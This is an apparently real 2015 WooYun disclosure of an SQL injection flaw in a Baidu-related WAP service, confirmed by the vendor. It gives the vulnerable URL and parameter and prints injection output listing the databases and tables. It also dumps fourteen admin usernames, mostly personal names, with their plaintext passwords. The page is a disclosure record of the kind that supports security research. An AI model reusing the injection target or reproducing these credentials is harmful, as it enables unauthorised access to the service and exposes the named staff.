当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116555

漏洞标题:百度某业务sql注入(管理人员账号密码泄露)

相关厂商:百度

漏洞作者: 杀器王子

提交时间:2015-05-27 18:28

修复时间:2015-07-11 19:00

公开时间:2015-07-11 19:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经确认,细节仅向厂商公开
2015-06-06: 细节向核心白帽子及相关领域专家公开
2015-06-16: 细节向普通白帽子公开
2015-06-26: 细节向实习白帽子公开
2015-07-11: 细节向公众公开

简要描述:

RT

详细说明:

http://42.62.39.206/wap/fl2/?mo=1&sortid=12&cm=M3140060&site=0
sortid参数

available databases [4]:
[*] baikan
[*] information_schema
[*] mysql
[*] test

漏洞证明:

Database: baikan
[21 tables]
+----------------------------+
| admin_user |
| baikan_psort |
| baikan_saomiao_block_log |
| baikan_saomiao_keyword_log |
| baikan_sort |
| channel_bookorder_duoku |
| channel_bookorder_duokubak |
| cmread_book_info |
| global_level |
| wap_advertisement |
| wap_advertposition |
| wap_block |
| wap_blockbooks |
| wap_blockchildren |
| wap_cooperater |
| wap_cpbooks |
| wap_feedback |
| wap_keyword |
| wap_keywordposition |
| wap_page |
| wap_page_block |
+----------------------------+


+------------------+-----------+
| uname | password |
+------------------+-----------+
| caiwu | GAZfPh |
| chenchi | xyaXEq |
| disanfang | uaHFhK |
| guojieming | 123456 |
| guoyunjiao | ftgA7I |
| hejianqiu | RVhzuS |
| jiangwenjuan | vYB2iS |
| languiwei | languiwei |
| liangyu | AJ6GIZ |
| liuyijiang | c9NJ7a |
| liyafei | VeaP3K |
| lougaohan | han000 |
| qixin | aPA8uw |
| shangguanshunmin | 3826353 |

修复方案:

过滤

版权声明:转载请注明来源 杀器王子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-27 18:58

厂商回复:

感谢

最新状态:

暂无